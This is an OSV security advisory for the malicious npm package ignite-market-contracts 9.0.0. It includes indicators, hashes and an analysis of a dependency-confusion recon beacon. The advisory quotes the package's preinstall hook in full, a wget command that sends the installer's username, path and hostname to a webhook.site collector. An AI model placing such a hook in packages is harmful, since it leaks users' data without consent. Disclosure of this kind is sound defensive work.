MAL-2026-4582

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contracts/MAL-2026-4582.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4582
Published
2026-05-22T00:15:50Z
Modified
2026-05-26T06:02:36.272873474Z
Summary
Malicious code in ignite-market-contracts (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc)

The package's preinstall lifecycle hook in package.json runs wget --quiet "https://webhook.site/64063d25-fcd3-44e5-a454-34845bc63250/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)", which fires automatically on npm install and transmits the installer's username, current working directory, and hostname to a third-party anonymous webhook collector. This is a recon beacon characteristic of dependency-confusion attacks: the installer-identifying data is sent to an attacker-controlled endpoint without consent. The package additionally has placeholder metadata (author 'me', empty description), a name that resembles legitimate marketplace/seaport contract packages, and declares a non-canonical dependency seaport-core-16 — all consistent with a dependency-confusion PoC or active recon stage targeting internal package namespaces.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-26T05:51:56.295933915Z",
            "versions": [
                "9.0.0"
            ],
            "sha256": "3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc",
            "id": "IN-MAL-2026-004100",
            "source": "amazon-inspector",
            "modified_time": "2026-05-22T00:15:50Z"
        }
    ]
}

Affected packages

npm / ignite-market-contracts

Package

Name
ignite-market-contracts
Purl
pkg:npm/ignite-market-contracts

Affected ranges

Affected versions

9.*
9.0.0

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "f8cb1efede8db0abca22b048e81c867ecb571053504c07ccb3c3f332aca048e8",
            "tlsh": "a4f07d799530eb571ac64f900820929ef271fa0b94412e0dde7323dd418e9db2479858",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-cEZOYHqu7Xw7V9SiaNM4aQ5ZE2keu4Zsdsa7z5HBCqZBDZRwgz/YlIcVxT8Q6rxWBwtMhq4FGhvos/+RqacBYQ==",
                "sha1": "3f80fd99f6bbee976c855b14f1e2e105605f7d4a"
            },
            "filename": "ignite-market-contracts-9.0.0.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contracts/MAL-2026-4582.json"